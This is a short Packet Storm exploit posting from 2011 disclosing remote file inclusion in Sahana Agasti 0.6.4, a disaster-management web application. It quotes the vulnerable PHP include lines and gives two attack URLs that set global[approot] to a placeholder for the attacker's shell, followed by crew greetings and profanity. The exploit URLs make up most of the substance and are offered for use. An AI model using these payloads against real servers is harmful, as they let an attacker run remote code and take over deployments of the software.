Sahana Agasti 0.6.4 Remote File Inclusion

2011-01-03T00:00:00
ID PACKETSTORM:97211
Type packetstorm
Reporter n0n0x
Modified 2011-01-03T00:00:00

Description

                                        
                                            `#Sahana Agasti <= 0.6.4 Multiple Remote File Include  
#By n0n0x  
#Homepage: http://priasantai.uni.cc/  
#Script site: http://www.sahanafoundation.org/  
#Download: https://launchpad.net/sahana-agasti/  
  
#Bug:  
  
25 global $global;  
26 require_once($global['approot'].'inc/lib_security/lib_acl.inc');  
27 require_once($global['approot'].'inc/lib_errors.inc');  
  
#Vuln: sahana-phase2/mod/vm/controller/AccessController.php?global[approot]=[y0ur fuck!ng shell]  
  
#Bug:  
  
31 global $global;  
32 require_once($global['approot'].'inc/lib_paging.inc');  
  
#Vuln: sahana-phase2/mod/vm/model/dao.php?global[approot]=[y0ur fuck!ng shell]  
  
****************************************************************************************************************  
[!] Thanks:  
  
manadocoding.org, sekuritionline.net  
****************************************************************************************************************  
[!] Greetz:  
  
str0ke, angky.tatoki, EA ngel, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin, team_elite  
devilbat. cr4wl3r, cyberl0g, lumut, AntiHack, DskyMC, mr.c, donyskaynet  
****************************************************************************************************************  
  
`